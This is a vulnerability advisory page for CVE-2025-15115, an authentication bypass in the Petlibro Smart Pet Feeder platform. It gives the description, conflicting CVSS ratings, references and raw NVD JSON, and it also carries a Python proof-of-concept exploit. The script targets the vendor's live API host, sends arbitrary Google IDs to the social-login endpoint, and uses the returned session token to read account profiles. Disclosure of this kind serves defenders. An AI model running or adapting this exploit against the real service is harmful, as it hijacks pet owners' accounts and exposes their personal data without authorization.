Security Vulnerability Report
CVE-2025-15115 CVSS 6.5 MEDIUM

CVE-2025-15115

Published: 2026-01-04 00:15:44
Last Modified: 2026-02-03 17:46:44

Description

Petlibro Smart Pet Feeder Platform versions up to 1.7.31 contains an authentication bypass vulnerability that allows unauthenticated attackers to access any user account by exploiting OAuth token validation flaws in the social login system. Attackers can send requests to /member/auth/thirdLogin with arbitrary Google IDs and phoneBrand parameters to obtain full session tokens and account access without proper OAuth verification.

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N
Note: the 6.5 figure is the Secondary-source CVSS v3.1 rating; the raw JSON data below also records a Primary CVSS v3.1 score of 9.8 CRITICAL (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H) and a CVSS v4.0 score of 6.9 MEDIUM, with weakness CWE-862, so triage should consider the Primary rating rather than the 6.5 shown in the header alone.

Configurations (Affected Products)

cpe:2.3:a:petlibro:petlibro:*:*:*:*:-:*:*:* - VULNERABLE
Petlibro Smart Pet Feeder Platform <= 1.7.31

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3 """ CVE-2025-15115 PoC - Petlibro Smart Pet Feeder Authentication Bypass Note: This PoC is for educational and security research purposes only. """ import requests import json import sys TARGET_HOST = "https://api.petlibro.com" # Example endpoint VULN_ENDPOINT = "/member/auth/thirdLogin" def exploit_auth_bypass(google_id, phone_brand="Android"): """ Exploit the OAuth validation flaw in Petlibro's social login system """ url = f"{TARGET_HOST}{VULN_ENDPOINT}" # Craft malicious request with arbitrary Google ID payload = { "googleId": google_id, "phoneBrand": phone_brand } headers = { "Content-Type": "application/json", "User-Agent": "Petlibro/1.7.31 Android" } try: response = requests.post(url, json=payload, headers=headers, timeout=10) if response.status_code == 200: data = response.json() if "data" in data and "token" in data.get("data", {}): token = data["data"]["token"] print(f"[+] SUCCESS: Authentication bypassed!") print(f"[+] Session Token: {token}") return token print(f"[-] Failed: Status {response.status_code}") print(f"[-] Response: {response.text}") return None except requests.exceptions.RequestException as e: print(f"[-] Request failed: {e}") return None def access_user_account(token): """ Use the obtained token to access user account """ headers = { "Authorization": f"Bearer {token}", "User-Agent": "Petlibro/1.7.31 Android" } # Try to access user profile profile_url = f"{TARGET_HOST}/member/user/profile" try: response = requests.get(profile_url, headers=headers, timeout=10) if response.status_code == 200: print(f"[+] Account access successful!") print(f"[+] Profile: {response.text}") except requests.exceptions.RequestException as e: print(f"[-] Failed to access account: {e}") if __name__ == "__main__": print("CVE-2025-15115 - Petlibro Authentication Bypass PoC") print("=" * 50) if len(sys.argv) > 1: google_id = sys.argv[1] else: google_id = "attacker-controlled-google-id-12345" token = exploit_auth_bypass(google_id) if token: 
access_user_account(token)

References

https://bobdahacker.com/blog/petlibro (Product)
https://www.vulncheck.com/advisories/petlibro-smart-pet-feeder-platform-through-authentication-bypass-via-api-endpoint (Third Party Advisory)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-15115", "sourceIdentifier": "[email protected]", "published": "2026-01-04T00:15:43.573", "lastModified": "2026-02-03T17:46:43.960", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Petlibro Smart Pet Feeder Platform versions up to 1.7.31 contains an authentication bypass vulnerability that allows unauthenticated attackers to access any user account by exploiting OAuth token validation flaws in the social login system. Attackers can send requests to /member/auth/thirdLogin with arbitrary Google IDs and phoneBrand parameters to obtain full session tokens and account access without proper OAuth verification."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 6.9, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", 
"modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 2.5}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-862"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:petlibro:petlibro:*:*:*:*:-:*:*:*", "versionEndIncluding": "1.7.31", "matchCriteriaId": "0B604E0A-05A3-46E0-8558-FF3F00F5EF0D"}]}]}], "references": [{"url": "https://bobdahacker.com/blog/petlibro", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.vulncheck.com/advisories/petlibro-smart-pet-feeder-platform-through-authentication-bypass-via-api-endpoint", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}